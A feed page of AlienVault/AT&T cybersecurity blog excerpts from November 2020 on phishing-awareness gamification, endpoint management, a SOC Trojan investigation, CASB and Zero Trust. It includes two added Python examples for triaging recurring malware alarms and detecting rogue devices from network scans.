AlienVault.webp 2020-11-17 12:00:00 Raising email security awareness through gamification (lien direct) October was National Cyber Security Awareness Month, which is an excellent opportunity to invest in a modern approach to email security awareness.  Most companies and organizations conduct security awareness training annually, during onboarding, and after an adverse event.  The effectiveness of periodic training varies greatly and depends on organizational culture and structure, leading to unexpected or undesired results.  Organizations should seek to modernize their awareness training and adopt a creative approach that addresses these challenges.  Gamification is a modern approach that personalizes awareness training by adding creativity to an otherwise mundane activity.  One way to think of gamification is as adding game principles, game dynamics, or game logic to a task to encourage participation.  By turning learning into a more interactive and fun activity, users and employees are motivated to participate, leading to better-sustained outcomes.  Applying gamification to email security training helps individuals and organizations change their behavior when it comes to email security. According to an article in Computerworld (July 2014), "Participants in our program were 50% less likely to click on a phishing link and 82% more likely to report a phishing email." (Patrick Heim, chief trust officer, Salesforce.com). How should organizations start with email security awareness gamification? Start with traditional awareness training and build upon that.  Once all email users have been through an initial round of security awareness training, follow up with a contest of sorts.  For example, reward users that report phishing emails correctly.  To create a broad behavioral change, publicize the contest winners' names and rewards.  Rewards and positive reinforcement encourage the reporting of phishing emails. 
This builds momentum among email users to participate in the game. This contest is the first step into the gamification experience.  This initial step highlights the effectiveness of traditional security awareness training.  During this phase, collect metrics to measure the buy-in of users and other stakeholders. Next, we want to increase the users' understanding of phishing emails.  Think of this phase as the gameplay aspect of gamification.  All games need the following components: a goal or objective (a definition of what winning is), rules of the game, and scoring.  Winning creates motivation to continue to play the game (positive reinforcement).  Rules help the players understand how to play and progress through the game.  Scoring shows the participants their achievements and how well they are doing. In email security awareness, we use phishing simulations to test users' understanding of a malicious email's type and content.  In the gamification version of these simulations, we score the details that users identify as malicious.  We call this game "Catch the Phish" and work through different levels of difficulty.  The first round contains blatantly obvious clues in misspellings, email addresses, and content.  In each subsequent round, the clues become less obvious, to the point where they are very subtle. To create positive momentum, publicize users' accomplishments on a leaderboard of sorts, either on the company's intranet, in a periodic newsletter, or in any other company-wide medium.  Other options within the spirit of gaming are to create inter-departmental or cross-department competitions, for example IT vs. Finance, HR vs. Legal, and so on. There are many creative ways to make email security awareness training an engaging, fun activity that increases users' participation and measurably enhances an organization' Guideline
AlienVault.webp 2020-11-17 06:01:00 What is unified endpoint management? UEM explained (lien direct) This blog was written by a third party author. The business world is undergoing its most dramatic shift yet, with the adoption of digital assets and workforce decentralization representing a huge business opportunity. These changes have led to added endpoints, or devices connecting to the network, and those endpoints are enabling this transformation. But managing the volume of these diverse endpoints across geographic locations has grown in complexity. Furthermore, along with these changes in technology adoption and distribution of the workforce, the cybersecurity landscape is also changing. The multitude of endpoints that connect to the network is expanding the attack surface that bad actors with malicious intent can attempt to exploit. From a cybersecurity perspective, this influx of endpoints represents a significant business risk. Organizations need to understand the importance of both managing and securing their endpoints and how these two variables are intertwined for a complete endpoint security strategy. What is UEM? Traditional mobile device management (MDM) has evolved, and in some ways UEM represents this modern evolution. With the dramatic increase of remote connectivity via mobile devices, the shift to work from home, and IoT adoption, unified endpoint management has become the solution for modern IT departments looking to secure these environments.  Unified endpoint management is more than just managing endpoints. The “unified” represents one console for deploying, managing, and helping to secure corporate endpoints and applications.  In addition, UEM offers capabilities for provisioning, detection, deployment, troubleshooting and updating. UEM software gives IT and security departments visibility and control over their devices as well as their end users, delivered through a centralized management console. 
The goal of UEM software is to simplify an organization's endpoint strategy. But when adopting UEM software, it’s critical to approach the implementation with a big-picture view and plan accordingly. UEM security benefits Unified endpoint management offers organizations many benefits, with the most appealing being reduced costs across multiple departments. By comprehensively automating many IT tasks and processes, UEM often lowers overhead costs and hardware expenditures. Other key benefits are as follows: Offers endpoint management integration with multiple platforms One of the major selling points of UEM software is its ability to integrate with a variety of platforms, including Windows 10, macOS, Linux, Chrome OS, iOS, and Android, among others. With UEM, your business can configure, control, and monitor devices on these platforms from a single management console. With this integration, the burden of connecting these systems is reduced, costs are lowered, and risks are mitigated. Provides data and app protection across the attack surface UEM protects corporate data and applications, reducing cybersecurity threats. This protection is accomplished by: Providing conditional user access Enforcing automated rules Enforcing compliance guidelines Providing safeguards against data loss Empowering IT administrators to identify jailbreaks and OS rooting on devices  And, when combined with a Mobile Threat Defense (MTD) solution, UEMs can enforce security policies and take automated remediation steps to further mitigate security risks for iOS and Android devices. Boasts advanced desktop management With UEM, desktop operating systems gain a digital transformation boost that simplifies deployment and helps optimize app delivery and patch automation. Plus, an endpoint’s data and apps can be Tool Vulnerability Threat Patching
AlienVault.webp 2020-11-16 12:00:00 Stories from the SOC – Multi-layered defense detects Windows Trojan (lien direct) Stories from the SOC is a blog series that describes recent real-world security incident investigations conducted and reported by the AT&T SOC analyst team for AT&T Managed Threat Detection and Response customers. Executive summary Malware infections are common and are often missed by antivirus software. Their impact on critical infrastructure and applications can be devastating to an organization's network, brand and customers if not remediated. With the ever-changing nature of cyberattacks, organizations need a layered security strategy. They shouldn’t depend solely on a single layer of security to keep them protected. A multi-layered approach helps ensure that anything that slips through the cracks is caught before it affects the business. The AT&T Managed Threat Detection and Response (MTDR) analyst team received an alarm indicating detection of a potentially malicious executable on a customer's SQL server, which the customer's antivirus software reported as mitigated. Despite the mitigated status, the team completed further analysis and discovered a history of similar events on the host. Based on the review of the server's event history, the team determined the threat was not mitigated and engaged the customer for remediation. MTDR served as the second layer of defense for this customer, quickly detecting a threat that had slipped through the cracks before any damage was done. Investigation Initial Alarm Review Indicators of Compromise (IOC) The initial alarm surfaced as the result of multiple events indicating that malware had been detected, removed, and no longer posed a threat to our customer's SQL server. Trojan malware infection Expanded Investigation Alarm Detail Malware infection alarms are common, but anti-malware software ordinarily handles malicious files effectively, not requiring any further action. 
Upon review of the server's alarm and event history, the team found that similar ‘Malware Detected' alarms had been observed days before. The older alarms were isolated, first-time occurrences and were successfully mitigated by the security controls the customer had in place. These alarms were closed as auto-mitigated. Automitigation Response Building the Investigation Reviewing instances of this nature should be considered standard practice. A detailed history of the involved asset, or of others affected by similar malware, usually serves as an indicator of a persisting malware infection: a file that keeps being detected and removed on the same host is being recreated by something the antivirus has not identified. Armed with historical context, we concluded this was likely a persisting malware infection affecting this server. All of the identified files, alarms, and events were gathered into an Investigation and presented to the customer with a recommendation to perform extensive scans on the asset at their earliest convenience. Customer Interaction The customer began their investigation shortly following the creation of the Investigation and the notification from our team. They confirmed the server had been compromised and were able to remediate the infection soon after. trojan has been remediated This incident serves as a reminder of why centralized logging and threat detection are important; the server's detailed history allowed us to conclude that there was a compromise despite anti-malware logs stating no further action was required for mitigation Malware Threat
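The correlation the analysts did by hand, written out as an added example (this is not code from the AT&T SOC or from USM Anywhere): replay a constructed stream of anti-malware alarms in time order and, instead of trusting each alarm's own "quarantined" status, escalate any host that has accumulated repeated detections inside a look-back window. The tab-separated event format, the host and detection names, the 7-day window and the two-prior-detections threshold are all assumptions chosen for the illustration.

```python
"""Replay anti-malware alarms and escalate hosts with recurring detections.

Added example for the investigation described above; it is not code from
the AT&T MTDR team or USM Anywhere. The event format, field names and the
7-day / two-prior-detections threshold are assumptions chosen for this
illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample alarms (not real customer data), one per line:
# timestamp, host, detection name, action reported by the antivirus.
# Note that every single alarm claims the file was quarantined.
SAMPLE_EVENTS = """\
2020-10-20T03:10:02Z\tSQL01\tTrojan:Win32/Generic\tquarantined
2020-11-09T03:12:44Z\tSQL01\tTrojan:Win32/Generic\tquarantined
2020-11-10T02:58:10Z\tSQL01\tTrojan:Win32/Generic\tquarantined
2020-11-10T14:22:09Z\tWKS17\tPUA:Win32/Toolbar\tquarantined
2020-11-11T03:05:31Z\tSQL01\tTrojan:Win32/Generic\tquarantined
2020-11-12T03:01:07Z\tSQL01\tTrojan:Win32/Generic\tquarantined
"""


def parse_events(text):
    """Parse the tab-separated alarm export into a list of dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, name, action = line.split("\t")
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "host": host,
            "name": name,
            "action": action,
        })
    return events


def triage_stream(events, window=timedelta(days=7), min_prior=2):
    """Replay alarms in time order and decide each one using host history.

    An alarm is closed as auto-mitigated only if the same host has fewer
    than `min_prior` earlier detections inside `window`. Otherwise it is
    escalated: the antivirus keeps finding the same kind of file on the
    same machine, so the file is being removed but whatever puts it there
    is not. The per-alarm AV action is deliberately ignored here, because
    trusting it is exactly what caused the earlier alarms to be auto-closed.
    """
    seen = defaultdict(list)   # host -> earlier events on that host
    decisions = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        recent = [p for p in seen[e["host"]] if e["ts"] - p["ts"] <= window]
        decision = "escalate" if len(recent) >= min_prior else "auto-mitigated"
        decisions.append({
            "host": e["host"],
            "ts": e["ts"],
            "name": e["name"],
            "decision": decision,
            # this alarm plus the prior detections inside the window
            "detections_in_window": len(recent) + 1,
        })
        seen[e["host"]].append(e)
    return decisions


def escalated_hosts(decisions):
    """Sorted list of hosts that had at least one escalated alarm."""
    return sorted({d["host"] for d in decisions if d["decision"] == "escalate"})


if __name__ == "__main__":
    decisions = triage_stream(parse_events(SAMPLE_EVENTS))
    for d in decisions:
        print(d["ts"].date(), d["host"], d["name"], d["decision"],
              "detections in window:", d["detections_in_window"])
    print("escalate:", escalated_hosts(decisions))
```

With the sample data, the October alarm on SQL01 falls outside the window and is closed, as are the first two November alarms; the third and fourth November alarms are escalated even though each one individually reports a successful quarantine. The workstation with a single detection is never escalated.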
AlienVault.webp 2020-11-12 12:00:00 Online purchase scams spike since the start of COVID-19, reports BBB (lien direct) This blog was written by an independent guest blogger. Scams occurring during online purchases have spiked since the start of the pandemic, as reported in new research conducted by the Better Business Bureau (BBB). Around 80.5% of consumers who reported this type of scam this year lost money, compared to 71.2% in 2015. Online purchase scams have been among the three riskiest scams for the past three years, but the situation has become significantly more severe in 2020. Whether you are a consumer or an online seller, what are the biggest issues you may have to face in terms of purchase scams, and what steps can you take to avoid them? The 2020 online purchase scams report The BBB’s new online scams report has found that the number one way consumers were enticed into a scam was via attractive sales prices. With the job market down and nearly 17 million people in the U.S. having filed initial claims for unemployment insurance at the outset of the virus, indications are already in that the unemployment rate is greater than it was at the peak of the Great Recession. Scammers are therefore taking advantage of the precarious situation of many to entice them with what seems like an irresistible offer. Scammers and availability Another way in which scammers are flourishing is by offering unavailable items. In March and April, many consumers found it difficult to access items like face masks, sanitizing gel, alcohol, and other protective items. The study showed that over half of all consumers who were scammed were unaware of the fact until they found that the items they had ordered were not arriving. The platforms these products appeared on were varied and included direct merchant websites, Instagram and Facebook, Google, and other ads that appeared while they were browsing other sites.  
Online stores are also fighting higher levels of fraud and merchant scams Interestingly, it isn’t only consumers that are being scammed; so too are sellers who have made the switch to online sales, unwittingly falling for merchant account schemes that have resulted in significant loss. There are many ways that sellers have been ‘taken for a ride.' These include purchasing merchant services from companies that have hidden fees. Usually, the seller is enticed by attractive rates for services, unwittingly signing on to contracts that then expose them to charges that have not been previously disclosed. In some cases, identity theft is involved, with devastating repercussions for sellers who have provided information such as bank account numbers, credit card numbers, and the like. Companies wishing to avoid being scammed should deal only with reputable providers. They should be wary of discounts and other promises that appear too good to be true. How Can Online Buyers Avoid Being Scammed? For online buyers, scam prevention involves a number of steps. The first is knowing the different risk groups. The BBB study indicates that although those aged 35-44 are most likely to be scammed (and younger buyers are at a higher risk than older ones), it is actually older purchasers who are likely to lose the largest amounts of money. Buyers should also be aware of typical scams (these can involve romance,
AlienVault.webp 2020-11-11 12:00:00 The Netflix streaming model can obviate your employee’s computer security (lien direct) This blog was written by an independent guest blogger. Someone you don’t know walks into your office and sits down at a computer. Maybe that computer is a corporate desktop assigned to a mid-level manager or to a member of your IT department. Maybe it’s a personally owned laptop used by a contractor. That unknown person plugs a USB dongle into that computer, installs some software (typing in the correct password, if requested), runs that software, and walks away. No problem, right?  Of course, that’s a problem. Yet that’s what happens every minute of every hour of every day when your workers use the Internet. Every animation from a Web-based business application is, in fact, software that’s downloaded and executed on that laptop or desktop. Each advertising network installs and runs software on the local computer. Every browser plug-in is actually software that runs locally. Some of those foreign applications are benign, harmless, maybe beneficial. Yet those apps can also dig deep into the end-user’s computer, perhaps accessing the file system and your intellectual property. Or maybe installing malware that can capture user identity information, including passwords and administrative credentials that an attacker can use to access network-based resources — and then launch a ransomware attack that can cripple your servers and cost your business millions. Remember, when your employees access cloud-based applications, such as ERP or CRM, everything is being delivered right to the desktop… where, potentially, an attacker might see what’s going on. The Internet has become vital for delivering the things your business needs, like Microsoft Office 365™, Google G-Suite™, Slack™, Salesforce™, NetSuite™, or Workday™. 
But it also subjects your office computers to risks due to device vulnerabilities, browser flaws, network interception, uncontrolled data access, or corruption of third-party websites via advertising networks or other malicious code. So, of course you’re not letting some unknown person sit down and access an employee’s endpoint device in person. That’s Cybersecurity 101. But in reality, your employees and contractors are inviting and authorizing foreign attacks by using a Web browser, any Web browser, and when the malware is installed, nobody even knows. You can’t rely on anti-virus, firewalls, intrusion detection/prevention systems, or deep packet inspection to catch that malware, because it came in via a trusted browser app. To reiterate: every time your users open a browser and load a web page, they execute third-party code on your computers and internal resources. That’s a wide-open door for every attacker and every exploit they can think of. What can you do? Stream. Let me try an analogy. Remember when you got VHS tapes from your local Blockbuster™, or DVDs by mail from Netflix™? You brought the media home and ran it on your local endpoint device – that is, your VHS or DVD player. We don’t do that anymore; we stream instead. We can see the proliferation of streaming video, not only with Netflix, but with Hulu™, Disney+™, HBO™, Amazon Prime™, CBS All-Access™, and more. Streaming movie services don’t actually send the movie file to your big-screen TV. Instead, they send an image of the movie, frame by frame, custom-formatted to your endpoint specifications. If you can handle 4K, they send 4K frames. If your TV is 1080p, they send 1080p frames. Easy. To summarize, you are watching a stream of pictures playing in real time, sent by the movie service to be displayed on your TV. The only software involved is the secure Netflix or Hulu app running on your smart TV or set-top box. 
Let’s bring that streaming model into the business computing rea Ransomware Malware
AlienVault.webp 2020-11-10 12:00:00 Protecting remote endpoints (lien direct) Although businesses have long had to address a number of remote assets associated with off-site resources, such as a sales force that’s often mobile, the number of remote endpoints has grown exponentially. The number of laptops and mobile devices needed to facilitate full-time work from home for a large percentage of workers, given recent global events, has exploded. Companies across all spectrums are challenged with establishing and maintaining an appropriate security posture holistically across their entire Information Technology environment. While one recent primary driver for this increase in the remote workforce may be the current pandemic, at least one recent study suggests that 67% of organizations who responded expect that work from home (WFH) policies which have been implemented in response to the pandemic will remain in place either long-term or perhaps permanently. As such, it’s imperative that organizations not only address these issues in the short term, but also incorporate practices that provide acceptable remote endpoint security postures in their strategic governance plans moving forward, with the expectation that this is the new normal. Endpoint security is often divided into three (3) distinct phases, with specific goals and actions present within each phase. The phases are: phases An effective endpoint security program will address all three phases. This blog post will focus on the first phase, Prevention, and how to address it utilizing AT&T’s Managed Vulnerability Program and the solutions we offer. Please note that this is in no way meant to classify the Prevention phase as more important than the other two endpoint protection phases. Future blog posts will expand on this to address the other two phases of endpoint security and together will collectively address this issue in its entirety. 
Prevention Prevention is a pre-attack phase that focuses on thwarting the exploitation of security weaknesses. Activities include establishing and maintaining accurate and up-to-date hardware / software inventories, as well as ensuring that the inventoried assets have highly secure configurations and all relevant patches applied. The high-level activities making up this phase are illustrated below: lifecycle In essence, these activities are often the foundation of all Vulnerability and Patch Management Programs. Asset inventories By executing periodic discovery scans using scan engines supplied with vulnerability management solutions, organizations are able to maintain accurate and up-to-date asset inventories. In addition, solutions that include the ability to deploy passive scan engines are especially helpful in maintaining an asset inventory, given their ability to constantly monitor network traffic and alert in near real time as they identify unknown assets on a network. Note that while passive scan engines are helpful, they’re not a requirement for maintaining effective asset inventories. By executing regular discovery scans on an aggressive cadence, a similar result can be achieved with active scan engines alone. Keep in mind that by comparing successive discovery scans (and the devices they find against the authorized inventory), or by utilizing alerts generated by passive scan engines, businesses can also use this activity to help identify any rogue devices that may be present within an environment. This is not only a best practice that all organizations should implement; inventories and rogue device detection are requirements included within many common security frameworks and compliance mandates (e.g. PCI DSS 2.4 and CIS Control 1 for inventories, and PCI DSS 11.1 and CIS Control 15 for rogue wireless device Vulnerability Threat
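The scan comparison described above, as an added example (this is not code from AT&T's Managed Vulnerability Program or from any scanner vendor): normalize the MAC addresses that different tools format differently, diff the current discovery scan against the previous one to see what appeared or vanished, and diff it against the authorized inventory to surface devices nobody registered. The CSV layouts, the use of MAC address as the join key, and the sample records are assumptions constructed for the illustration; a real inventory would typically also carry asset owner, location and scan-engine source.

```python
"""Compare a discovery scan against the previous scan and the authorized
inventory to surface rogue devices.

Added example for the asset-inventory activity described above; it is not
code from AT&T's Managed Vulnerability Program or any scanner vendor. The
CSV layouts, the choice of MAC address as the join key and the sample
records are assumptions constructed for this illustration.
"""
import csv
import io
import re

# Constructed sample data (not from a real network). Scanners and
# inventory tools disagree on MAC formatting, so the join key has to be
# normalized before anything is compared.
INVENTORY_CSV = """\
asset_tag,mac,owner
A-1001,00:1A:2B:3C:4D:5E,dba-team
A-1002,00:1A:2B:3C:4D:5F,finance
A-1003,00:1A:2B:3C:4D:60,facilities
"""

PREVIOUS_SCAN_CSV = """\
ip,mac,hostname
10.0.1.10,00:1a:2b:3c:4d:5e,sql01
10.0.1.57,00:1a:2b:3c:4d:5f,wks17
10.0.1.80,001a.2b3c.4d60,printer-2f
"""

CURRENT_SCAN_CSV = """\
ip,mac,hostname
10.0.1.10,00-1A-2B-3C-4D-5E,sql01
10.0.1.57,00:1a:2b:3c:4d:5f,wks17
10.0.1.203,d8:47:32:aa:bb:cc,raspberrypi
"""


def normalize_mac(mac):
    """Canonical lower-case colon form; accepts 00-1A-..., 001a.2b3c.4d5e, etc."""
    hexdigits = re.sub(r"[^0-9a-f]", "", mac.lower())
    if len(hexdigits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(hexdigits[i:i + 2] for i in range(0, 12, 2))


def parse_by_mac(text):
    """CSV with a `mac` column -> {normalized_mac: row}. Used for scans and inventory."""
    return {normalize_mac(r["mac"]): r for r in csv.DictReader(io.StringIO(text))}


def diff_scans(previous, current):
    """Devices that appeared since the last scan, and devices that vanished."""
    appeared = set(current) - set(previous)
    vanished = set(previous) - set(current)
    return appeared, vanished


def rogue_report(current, inventory):
    """Unauthorized devices on the wire, and inventoried assets not seen.

    A device in the scan but not in the inventory is the rogue-device case;
    an inventoried asset missing from the scan is worth a look too (moved,
    powered off, or the scan did not reach its segment).
    """
    unauthorized = [{**current[m], "mac": m} for m in sorted(set(current) - set(inventory))]
    missing = sorted(inventory[m]["asset_tag"] for m in set(inventory) - set(current))
    return {"unauthorized": unauthorized, "missing": missing}


if __name__ == "__main__":
    prev, curr = parse_by_mac(PREVIOUS_SCAN_CSV), parse_by_mac(CURRENT_SCAN_CSV)
    appeared, vanished = diff_scans(prev, curr)
    print("new since last scan:", sorted(appeared))
    print("gone since last scan:", sorted(vanished))
    report = rogue_report(curr, parse_by_mac(INVENTORY_CSV))
    for dev in report["unauthorized"]:
        print("ROGUE:", dev["ip"], dev["mac"], dev["hostname"])
    print("inventoried but not seen:", report["missing"])
```

Keying on MAC rather than IP matters: the SQL server keeps its address across both scans here, but a DHCP client that moves from one address to another would otherwise show up as one device vanishing and a new one appearing. MAC is not tamper-proof either, which is why the passive engines the text mentions, and an inventory that records more than one identifier, are the stronger position.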
AlienVault.webp 2020-11-09 12:00:00 SecTor 2020, Canada's Biggest Cybersecurity Event: Day Two (lien direct) This blog was written by an independent guest blogger. Even though SecTor had to be entirely online this year due to our unusual international circumstances, there have been plenty of excellent talks from many experienced cybersecurity professionals. The talks took place over the course of two days, October 21st and 22nd. Last time I covered the talks I attended on day one. Interestingly enough, the talks all had to do with threat detection and analysis. Maybe that’s just what I’m fixated on these days. The talks I attended on the second day all covered matters businesses must be aware of these days and well into the future. On day two, I learned a lot about how to talk to non-technical executives about security, the unique challenges of cloud security, and the legal implications of cyber threats. Enjoy! How to Talk to the Board About Cybersecurity The first talk I attended on the second day was presented by Jeff Costlow, a CISO with nearly 25 years of industry experience. This is the description of the talk from SecTor’s web app: “With the sudden shift of the global workforce from in-office to remote, IT teams quickly transformed their operations to accommodate the new realities of business — including large-scale adoption of work-from-home technologies, heightened activity on customer-facing networks, and greater use of online services. While these examples of agility allowed business to continue, they also greatly increased the risk of misconfigurations and cyberthreats. Now, it’s looking like they could be here to stay for a while. On top of that, bad actors have wasted no time trying to exploit new vulnerabilities. In the past several weeks, we’ve seen ransomware attacks affect several major organizations. 
These attacks come on the tail of a surge of attacks across the board brought on during the pandemic, as hackers scanned and took advantage of new workloads, and vulnerable VPN connections and misconfigurations left the gates to the network open. When attacks like these make headlines, panicked board members have one question for CISOs: how can we be sure that won’t happen to us? Drawing from nearly 25 years of experience in the security industry, Jeff Costlow, CISO at ExtraHop, will share his top strategies for CISOs to lead board-level conversations about risk management amidst the stark new realities of IT.” When risk enters an organization through devices that the IT department cannot control, securing a network becomes very difficult. Any devices and applications that connect to the network that administrators can’t administer are considered to be “shadow IT.” This is often a consequence of bring-your-own-device habits, but not always. Jeff Costlow slide Costlow discussed the implications of shadow IT: “All you have to do is Google or use the search engine of your choice. Search ‘shadow IT horror stories,’ and you will find a ton of these. There is the laptop that runs underneath someone's desk. It turns out it's a business-critical piece of software that everyone's using, and it's just running on a laptop under a desk somewhere. There are also plenty of stories. These are some of my favorites, the ones about somebody who just wanted to get their job done. And so they started forwarding all their business email to their Google account or their Yahoo account or something like that. Or maybe personal Dropbox use. One of my favorites is unapproved chat clients. Or even worse, operating those chat rooms. This is sometimes called ChatOps. We're inside a chat r Ransomware Vulnerability Threat Guideline Yahoo
AlienVault.webp 2020-11-09 06:01:00 What is a virtual CISO? (lien direct) This blog was written by a third party author. Organizations today host a wide range of information that, due to its external value to competitors, nation-states, or cybercriminals, needs to be properly protected.  The role of a Chief Information Security Officer (CISO) is to establish and maintain the organizational strategy and execution to protect its sensitive and valuable information assets and surrounding technologies. But many organizations, while having data that needs protecting, choose to utilize a virtual CISO (vCISO) to address the needs of the CISO role rather than hire one internally. What is a virtual Chief Information Security Officer? The vCISO is a security practitioner who uses the culmination of their years of cybersecurity and industry experience to help organizations develop and manage the implementation of the organization’s information security program. At a high level, vCISOs help to architect the organization’s security strategy, with some also helping to manage its implementation. Internal security staff may still exist, either reporting to or working with the vCISO and their team to execute an impactful security program.  Additionally, the vCISO is usually expected to be able to present the organization’s state of information security to the organization’s board, executive team, auditors, or regulators. vCISOs can provide value to organizations by helping with a number of aspects of the overall information security program, including: Information security planning and management activities Organizational and management structure Initiatives affecting information practices Security risk management activities Evaluation of third parties with access to organizational data Coordination of audits by regulators or customers Why are vCISOs becoming more popular?  
The idea of a virtual CISO has grown in demand with organizations for a number of reasons: CISOs are in demand – Cybersecurity has moved to the forefront of organizational concern.  With the rise in cyberattacks, data breaches and attack sophistication, and the focus locked in on an organization’s information, organizations wanting to put a comprehensive set of controls and technologies in place need a CISO. A vCISO allows an organization to quickly fill the CISO role without needing to go through the hiring process. CISOs are expensive – According to salary.com, the average CISO costs over $200,000 a year. While nearly every organization needs a CISO, not every one of them can afford one. A vCISO allows organizations to avoid the expense of employing one in-house full-time, paying only for the services and time used. vCISOs can be more experienced – A vCISO has implemented information security programs for many clients in a diverse set of industries and sizes, giving them a broad range of expertise that can be applied to your organization. vCISOs can be anywhere – Rather than needing to hire someone locally (which limits your options) or needing to help pay for a candidate to relocate, the vCISO works as a consultant from just about anywhere, giving the organization exposure to more potential candidates. vCISOs are a consumption-based option – While not every vCISO works the same way, this is a contractor who will perform tasks based on an agreed-upon scope of work. So, you’re paying for the services you want from them. Use Cases for a vCISO The choice of a vCISO versus a full-time CISO may still be unclear. So, allow me to provide a list of a few possible use cases for when a vCISO m
AlienVault.webp 2020-11-05 12:00:00 Best data security practices when offboarding employees (lien direct) This blog was written by an independent guest blogger. In times long gone, disgruntled former employees could only do so much damage to your company, and relatively little at all to your data security. In the fast-moving world of the 21st century, however, it’s a different story. Costly data breaches and devastating thefts have been carried out in recent years by dissatisfied staff members released from their job duties. In fact, major data breaches caused by angry ex-employees even prompted an FBI report on the matter, with the risks posed by former staff members on the rise, which has left CEOs feeling worried, vulnerable, and searching for reliable solutions. Make no mistake, offboarding employees is currently a situation which presents a considerable data security risk. If you’re wondering what to do when it comes to releasing a staff member who has access to sensitive material, or are concerned that former staff members still have access to your data, you’re far from alone. In this article, we’re going to look at the nature of this major issue, as well as presenting some essential best practices for avoiding the potential catastrophes this situation can create. Offboarding employees: Where does the data security risk lie? Most of us are aware of the risks associated with hackers and bad actors from the outside trying to access your data. We’re familiar with best practices for password security, and how to avoid the kind of common pitfalls that come with handling sensitive data on a daily basis. With the rise of pandemic-inspired remote work, a major data exposure risk now comes from improper vetting of outsourced hires. This used to be a smaller problem, but as outsourcing has increased exponentially, so has the potential to suffer a breach from the “outside” inside workforce.  
Dealing with these employees turned threats (or at least potential threats), who still possess passcodes and knowledge and have recently acquired a potential motive to do harm, is a scenario most companies find themselves relatively unprepared for. The greatest risk? Quite simply, the loss or theft of the most sensitive corporate data stored in your systems. Dissatisfied or angry ex-employees often have the motivation to steal this kind of data and use it to blackmail your organization or sell it to the highest bidder on the Dark Web. If you think this would never happen in your company, think again. A Cyber-Ark survey found that no less than 88% of IT employees would consider stealing sensitive data if they were fired, which should be a worrying statistic to business owners and managers who care about data security! All of this makes one thing abundantly clear. An effective, thorough, and formal offboarding process is essential for avoiding this eventuality. Studies have shown that nearly 90% of employees are Threat Studies Guideline
AlienVault.webp 2020-11-05 06:01:00 What is a Cloud Access Security Broker? CASB explained (direct link) This blog was written by a third party author. What is a Cloud Access Security Broker (CASB)? A common component of modern cybersecurity infrastructure, a cloud access security broker (CASB) is technology that monitors and mitigates the risks arising from employee use of cloud services. CASBs were initially developed to fill a gap in cloud security visibility left behind by traditional firewalls, next-generation firewalls, and early secure web gateways, which struggled to identify instances of the unapproved use of cloud services, otherwise known as shadow IT or rogue IT. Since then, CASB has evolved into a fully featured cloud governance control that can both monitor and manage which cloud services employees use and how they use them, whether they're connecting from the corporate network or remotely. According to Gartner, in spite of slowing spending growth across the security industry, organizations have bolstered their CASB spending by 33% in 2020 as the category "has entered the mainstream," posting the largest increase of any information security market. The benefits CASB provides Industry experts say that the features and benefits of CASB tend to cluster around four major areas: visibility, compliance, data security, and threat protection. These are what Gartner analysts first coined as the four pillars of CASB. Visibility CASB provides insight, alerting, and reporting on inbound and outbound cloud activity. This includes visibility into which cloud services are being used, who is using them, what content is being sent to and stored in the cloud, and whether security policies are being followed in the process. Compliance Beyond basic behavioral visibility, CASB gives risk and compliance personnel granular reporting that makes it possible to track how regulated data is stored across various cloud services.
The level of detail makes it easier to prove to auditors whether cloud data handling and encryption practices for personally identifiable information (PII) meet compliance requirements for regulations like PCI DSS and HIPAA. Data security Reporting is just one component of the data privacy and security role that CASB plays. It can also enforce a range of data security policies. This includes access control based on contextual variables like role, device type, device protection status, geography, and more. CASB can extend data loss prevention (DLP) controls across the cloud and restrict sharing of certain classes of data across all cloud stores or certain providers. In addition, CASB can be configured to enforce encryption or tokenization practices and to support enhanced authentication practices and integration with technology like single sign-on (SSO) and identity and access management (IAM) platforms. Threat protection CASB provides controls and integration with other security products to protect organizational data from both insider and external threats. A key part of this is behavior-based activity monitoring to block and alert on suspicious activity that could indicate negligent or malicious insiders or potentially compromised accounts. Additionally, many CASBs can analyze for and block malware in cloud resources. Where can a CASB be deployed? CASB deployments can vary greatly, with the category offering a range of possibilities for monitoring and enforcement of usage from: Inside the network Remote work connections Cloud-to-cloud connections Visibility and controls are applie Malware Threat
AlienVault.webp 2020-11-04 12:00:00 In Zero we trust (direct link) This blog was written by an independent guest blogger. The network is rapidly changing – what was once known as the ‘perimeter’, a crunchy solid exterior with a soft chewy center of endpoints, has eroded into a mush of mobile devices, BYOD, IoT and hybrid cloud. Corporate applications and data are moving from on-premise to hybrid and cloud environments, increasing cloud workloads by the day, and enterprises want to give their staff the ability to access data anytime, anywhere. The location of applications, users, and their devices (which are sometimes unmanaged) is no longer static. Traditional perimeter security methods have done little to stem the flow of today’s cyber-attack reality, and this is where Zero Trust Architecture (ZTA) comes to the rescue! ‘Zero Trust’ was first introduced by Forrester Research and considers ‘inherent trust’ a critical vulnerability. The strapline for Zero Trust is ‘never trust, always verify’: everything from the user’s identity to the application’s hosting posture is used to provide least-privileged access, even after authentication and authorisation in many cases. The National Institute of Standards and Technology (NIST) approach to Zero Trust is focused on 8 principles, listed below: 1. All data sources and computing services are considered resources. 2. All communication is secured regardless of network location. 3. Access to individual enterprise resources is granted on a per-session basis. 4. Access to resources is determined by dynamic policy—including the observable state of client identity, application, and the requesting asset—and may include other behavioral attributes. 5. The enterprise ensures that all owned and associated devices are in the most secure state possible and monitors assets to ensure that they remain in the most secure state possible. 6. All resource authentication and authorization are dynamic and strictly enforced before access is allowed. 7. The enterprise collects as much information as possible about the current state of network infrastructure and communications and uses it to improve its security posture. Some of the key benefits of ZTA include: Helps reduce the risk of a breach Enhances visibility by discovering and classifying all devices on the network Supports regulation and compliance activities Greater control over cloud environments Enables digital transformation initiatives While there are many benefits of implementing ZTA, it is by no means straightforward to achieve, and there are a few factors for any business to consider before embarking on a ZTA journey. Some of these factors are listed below - ZTA is not a product – it does not come plug & play! ZTA programs can be complex, time-consuming and expensive initiatives that need to be tailored to each individual organisation's needs. The complex network infrastructures we see in today’s enterprises can present huge challenges if they are not micro-perimeter compatible, leading to expensive redesign and testing which are potentially disruptive to business operations. Therefore, there needs to be a serious business case to invest in a ZTA. ZTA Requires Strong Data-Centric Context: In ZTA, verification and access controls are based on the data, not the platform or application. Therefore, enterprises need to identify what users, data and resources are connecting across the organisation. The key challenge is therefore mapping the flows of sensitive and critical data, identifying who needs to have access to it and then segmenting/zoning the network Guideline
